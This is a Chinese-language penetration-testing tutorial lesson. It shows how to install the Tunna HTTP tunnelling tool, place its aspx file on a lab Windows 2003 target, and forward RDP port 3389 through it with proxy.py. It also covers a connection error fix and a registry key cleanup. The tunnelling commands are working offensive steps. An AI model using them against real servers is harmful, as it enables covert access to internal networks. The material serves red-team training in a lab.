# 第九十九课:HTTP隧道Tunna第三季 **Tunna简介:** Tunna1.1 是 secforce 在2014年11月出品的一款基于HTTP隧道工具。其中v1.1中支持了SOCKS4a。 Tunna演示稿:\ Github:\ **攻击机:**\ 192.168.1.5 Debian\ 192.168.1.4 Windows 7 **靶机:**\ 192.168.1.119 Windows 2003 **安装:** ```bash root@John:~# git clone https://github.com/SECFORCE/Tunna.git Cloning into 'Tunna'... remote: Enumerating objects: 6, done. remote: Counting objects: 100% (6/6), done. remote: Compressing objects: 100% (6/6), done. remote: Total 156 (delta 0), reused 2 (delta 0), pack‐reused 150 Receiving objects: 100% (156/156), 8.93 MiB | 25.00 KiB/s, done. Resolving deltas: 100% (84/84), done. ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPe3IDqvDKh1kD0Dt8%2Fdac94b993935a569d6b5cec53e91eb54.jpg?generation=1551066059829105\&alt=media) **靶机执行:** 以aspx为demo。 ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPe3IGfcHVhnaP8WqY%2F45105406fce5e573635d20030393a928.jpg?generation=1551066070792678\&alt=media) **攻击机执行:** ```python python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPe3IKJr4VbjSFU5ox%2F270e3220479652ae6eb658f40156cf97.jpg?generation=1551066052603670\&alt=media) ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPe3INvBPmgKTSvVgV%2F5e8e8a0ea358fdf98fc37bbb31b5994e.jpg?generation=1551066084297484\&alt=media) ## 附录: **解决:**General Exception: \[Errno 104] Connection reset by peer ```bash [+] Spawning keep‐alive thread [‐] Keep‐alive thread not required [+] Checking for proxy: False ``` 连接后,出现 ```bash General Exception: [Errno 104] Connection reset by peer ``` 等待出现:**无法验证此远程计算机的身份,是否仍要连接?** 再次运行,在点击是(Y) ```bash python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPe3IQzUcKnYmZBuN8%2F086a4ba0d1640a1d5b5efb747490329d.jpg?generation=1551066083085411\&alt=media) ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPe3ISMibZ7aQBb-Tc%2F1a7fb8afe7862e95f22ce331e1ea6480.jpg?generation=1551066097932809\&alt=media) ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPe3IU1y3czJ5NScCg%2F89343acc07c18c27399943cd200091b6.jpg?generation=1551066074231401\&alt=media) **如果:没有出现“无法验证此远程计算机的身份,是否仍要连接?”** 注册表键值: HKEY\_CURRENT\_USER\Software\Microsoft\Terminal Server Client\Servers 删除对应IP键值即可。 非常遗憾的是,Tunna对PHP的支持并不是太友好。 > Micropoor